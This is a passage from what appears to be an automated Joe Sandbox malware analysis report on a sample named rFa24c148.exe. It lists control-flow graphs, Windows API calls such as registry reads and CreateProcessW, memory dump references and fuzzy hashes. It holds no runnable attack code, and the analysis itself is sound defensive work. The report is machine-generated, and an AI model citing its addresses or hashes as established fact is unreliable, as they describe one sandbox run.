                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: Close$DeleteEnumOpen
                                                                                              • String ID:
                                                                                              • API String ID: 1912718029-0
                                                                                              • Opcode ID: 90468eb9bf3c1f3e00f044c7195eeae7ded6c1ef4985fc59ea46c38fcee507d8
                                                                                              • Instruction ID: 24cb19e20ea0269922d23406ceb1d71d2baff7de250534ea652b51db9971d4c8
                                                                                              • Opcode Fuzzy Hash: 90468eb9bf3c1f3e00f044c7195eeae7ded6c1ef4985fc59ea46c38fcee507d8
                                                                                              • Instruction Fuzzy Hash: 2B113A71904008FEEF219F90DE89EAE3B79EB54348F104476FA05B10A0D3B59E51EA69

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 747 10001771-100017ad call 10001b3e 751 100017b3-100017b7 747->751 752 100018be-100018c0 747->752 753 100017c0-100017cd call 100022eb 751->753 754 100017b9-100017bf call 100022a1 751->754 759 100017fd-10001804 753->759 760 100017cf-100017d4 753->760 754->753 761 10001824-10001828 759->761 762 10001806-10001822 call 1000248d call 100015cc call 10001280 GlobalFree 759->762 763 100017d6-100017d7 760->763 764 100017ef-100017f2 760->764 769 10001866-1000186c call 1000248d 761->769 770 1000182a-10001864 call 100015cc call 1000248d 761->770 787 1000186d-10001871 762->787 767 100017d9-100017da 763->767 768 100017df-100017e0 call 10002868 763->768 764->759 765 100017f4-100017f5 call 10002b23 764->765 779 100017fa 765->779 775 100017e7-100017ed call 1000260b 767->775 776 100017dc-100017dd 767->776 782 100017e5 768->782 769->787 770->787 786 100017fc 775->786 776->759 776->768 779->786 782->779 786->759 790 10001873-10001881 call 10002450 787->790 791 100018ae-100018b5 787->791 797 10001883-10001886 790->797 798 10001899-100018a0 790->798 791->752 793 100018b7-100018b8 GlobalFree 791->793 793->752 797->798 799 10001888-10001890 797->799 798->791 800 100018a2-100018ad call 10001555 798->800 799->798 802 10001892-10001893 FreeLibrary 799->802 800->791 802->798
                                                                                              APIs
                                                                                                • Part of subcall function 10001B3E: GlobalFree.KERNEL32(?), ref: 10001DA9
                                                                                                • Part of subcall function 10001B3E: GlobalFree.KERNEL32(?), ref: 10001DAE
                                                                                                • Part of subcall function 10001B3E: GlobalFree.KERNEL32(?), ref: 10001DB3
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 1000181C
                                                                                              • FreeLibrary.KERNEL32(?), ref: 10001893
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 100018B8
                                                                                                • Part of subcall function 100022A1: GlobalAlloc.KERNEL32(00000040,405EA210), ref: 100022D3
                                                                                                • Part of subcall function 1000260B: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017ED,00000000), ref: 1000267D
                                                                                                • Part of subcall function 100015CC: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001749,00000000), ref: 100015E5
                                                                                                • Part of subcall function 1000248D: wsprintfW.USER32 ref: 100024E1
                                                                                                • Part of subcall function 1000248D: GlobalFree.KERNEL32(?), ref: 10002559
                                                                                                • Part of subcall function 1000248D: GlobalFree.KERNEL32(00000000), ref: 10002582
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2062996466.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2062980489.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2063018747.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2063039760.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_10000000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$Free$Alloc$Librarylstrcpywsprintf
                                                                                              • String ID:
                                                                                              • API String ID: 1767494692-3916222277
                                                                                              • Opcode ID: 7233f16ba86abf9f30ab0ca362f30c0571f5e64aff198df6ce991b39b1ebc49f
                                                                                              • Instruction ID: b3d4579510dcbc356f87b8c5eb81e8e4ebd4f83f88234b59d07570181d0aa013
                                                                                              • Opcode Fuzzy Hash: 7233f16ba86abf9f30ab0ca362f30c0571f5e64aff198df6ce991b39b1ebc49f
                                                                                              • Instruction Fuzzy Hash: 7831BF799043459AFB10DF74DCC5BDA37E8EB043D4F058529F90AAA08EDF74A985C760

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 804 401bca-401be2 call 402b1d * 2 809 401be4-401beb call 402b3a 804->809 810 401bee-401bf2 804->810 809->810 812 401bf4-401bfb call 402b3a 810->812 813 401bfe-401c04 810->813 812->813 816 401c06-401c1a call 402b1d * 2 813->816 817 401c4a-401c74 call 402b3a * 2 FindWindowExW 813->817 827 401c3a-401c48 SendMessageW 816->827 828 401c1c-401c38 SendMessageTimeoutW 816->828 829 401c7a 817->829 827->829 830 401c7d-401c80 828->830 829->830 831 401c86 830->831 832 4029c7-4029d6 830->832 831->832
                                                                                              APIs
                                                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Timeout
                                                                                              • String ID: !
                                                                                              • API String ID: 1777923405-2657877971
                                                                                              • Opcode ID: 9509e5e7a0907e764604f6084ff3dd6a46145b46d1e6bef9a99a17c67a449adc
                                                                                              • Instruction ID: 32ea72146a28600a98e99adc179119cd295c2a32732311222b232d5c22eb20b7
                                                                                              • Opcode Fuzzy Hash: 9509e5e7a0907e764604f6084ff3dd6a46145b46d1e6bef9a99a17c67a449adc
                                                                                              • Instruction Fuzzy Hash: 8B217471A44109BEDF019FB0C94AFAD7B75EF44748F20413AF502B61D1D6B8A941DB18
                                                                                              APIs
                                                                                              • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,Call,?,00405EB7,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405C6E
                                                                                              • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,00405EB7,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405C8F
                                                                                              • RegCloseKey.ADVAPI32(?,?,00405EB7,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405CB2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseOpenQueryValue
                                                                                              • String ID: Call
                                                                                              • API String ID: 3677997916-1824292864
                                                                                              • Opcode ID: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                                                              • Instruction ID: 3cd74c106f1fbed165a62e297fbc125935b5083a19d10d34083766567549a8a9
                                                                                              • Opcode Fuzzy Hash: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                                                              • Instruction Fuzzy Hash: 4901083115420AEBEB218F66ED09E9B3FA8EF85354F00402AF915E6260D335D964DBA5
                                                                                              APIs
                                                                                              • GetTickCount.KERNEL32 ref: 00405A30
                                                                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004031FD,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405A4B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountFileNameTempTick
                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                              • API String ID: 1716503409-678247507
                                                                                              • Opcode ID: 7292a228a83fa3ff922d64c5f727ba47b2c13c899f9c2b13fefe68a2db1948d4
                                                                                              • Instruction ID: 95f7d282eddd658cc867a71ae78a7f6d6a22d0bd0d4c40af2882d7f7832b811b
                                                                                              • Opcode Fuzzy Hash: 7292a228a83fa3ff922d64c5f727ba47b2c13c899f9c2b13fefe68a2db1948d4
                                                                                              • Instruction Fuzzy Hash: 68F03676700204BBDB009F55DD45F9F77A8EBD5710F10813AE905F7190E6B0AE548B64
                                                                                              APIs
                                                                                                • Part of subcall function 00405021: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsnA538.tmp\System.dll,00000000,0040FE48,00000000,?,?,?,?,?,?,?,?,?,004030DB,00000000,?), ref: 00405059
                                                                                                • Part of subcall function 00405021: lstrlenW.KERNEL32(004030DB,Skipped: C:\Users\user\AppData\Local\Temp\nsnA538.tmp\System.dll,00000000,0040FE48,00000000,?,?,?,?,?,?,?,?,?,004030DB,00000000), ref: 00405069
                                                                                                • Part of subcall function 00405021: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsnA538.tmp\System.dll,004030DB,004030DB,Skipped: C:\Users\user\AppData\Local\Temp\nsnA538.tmp\System.dll,00000000,0040FE48,00000000), ref: 0040507C
                                                                                                • Part of subcall function 00405021: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsnA538.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsnA538.tmp\System.dll), ref: 0040508E
                                                                                                • Part of subcall function 00405021: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004050B4
                                                                                                • Part of subcall function 00405021: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004050CE
                                                                                                • Part of subcall function 00405021: SendMessageW.USER32(?,00001013,?,00000000), ref: 004050DC
                                                                                                • Part of subcall function 004054F2: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256A0,Error launching installer), ref: 00405517
                                                                                                • Part of subcall function 004054F2: CloseHandle.KERNEL32(?), ref: 00405524
                                                                                              • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                                                                              • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                                                              • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                              • String ID:
                                                                                              • API String ID: 3585118688-0
                                                                                              • Opcode ID: 8e7fac8ae1f025a0d1602a8f0f4718163d1cda1f3a438d2d2952dbcc5513a653
                                                                                              • Instruction ID: bec0dc1b772bef8e3dfa3c1b84bb43adcf6872ff1fa5701b8d2c68c635bc108f
                                                                                              • Opcode Fuzzy Hash: 8e7fac8ae1f025a0d1602a8f0f4718163d1cda1f3a438d2d2952dbcc5513a653
                                                                                              • Instruction Fuzzy Hash: 2811A131D04204EBDF109FA0CD859DE7AB5EB04319F204437F501BA1E1C3798982DB9A
                                                                                              APIs
                                                                                                • Part of subcall function 00405D77: lstrcpynW.KERNEL32(?,?,00000400,0040326D,004281A0,NSIS Error), ref: 00405D84
                                                                                                • Part of subcall function 0040586D: CharNextW.USER32(?,?,C:\,?,004058E1,C:\,C:\,?,?,74DF3420,0040561F,?,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\rFa24c148.exe"), ref: 0040587B
                                                                                                • Part of subcall function 0040586D: CharNextW.USER32(00000000), ref: 00405880
                                                                                                • Part of subcall function 0040586D: CharNextW.USER32(00000000), ref: 00405898
                                                                                              • lstrlenW.KERNEL32(C:\,00000000,C:\,C:\,?,?,74DF3420,0040561F,?,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\rFa24c148.exe"), ref: 00405923
                                                                                              • GetFileAttributesW.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,?,?,74DF3420,0040561F,?,C:\Users\user\AppData\Local\Temp\,74DF3420), ref: 00405933
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                              • String ID: C:\
                                                                                              • API String ID: 3248276644-3404278061
                                                                                              • Opcode ID: 47f1b0a461492265196efcc5ce18cbe6f25592d9a092f8b828f6d1fc555b0b8e
                                                                                              • Instruction ID: 0f7a694044e1ae6067649bf4c27e992d8c5df1d17723ae8105b53f34b172a702
                                                                                              • Opcode Fuzzy Hash: 47f1b0a461492265196efcc5ce18cbe6f25592d9a092f8b828f6d1fc555b0b8e
                                                                                              • Instruction Fuzzy Hash: BBF0F926204D5155E62132365C05AAF1519CE82724B59893FFC50B12C1DB3C89539C7E
                                                                                              APIs
                                                                                              • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256A0,Error launching installer), ref: 00405517
                                                                                              • CloseHandle.KERNEL32(?), ref: 00405524
                                                                                              Strings
                                                                                              • Error launching installer, xrefs: 00405505
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCreateHandleProcess
                                                                                              • String ID: Error launching installer
                                                                                              • API String ID: 3712363035-66219284
                                                                                              • Opcode ID: 3b6d012946cdb1e415ed4126777acf452f9caf94abf9bf389c8640f9b16c30f7
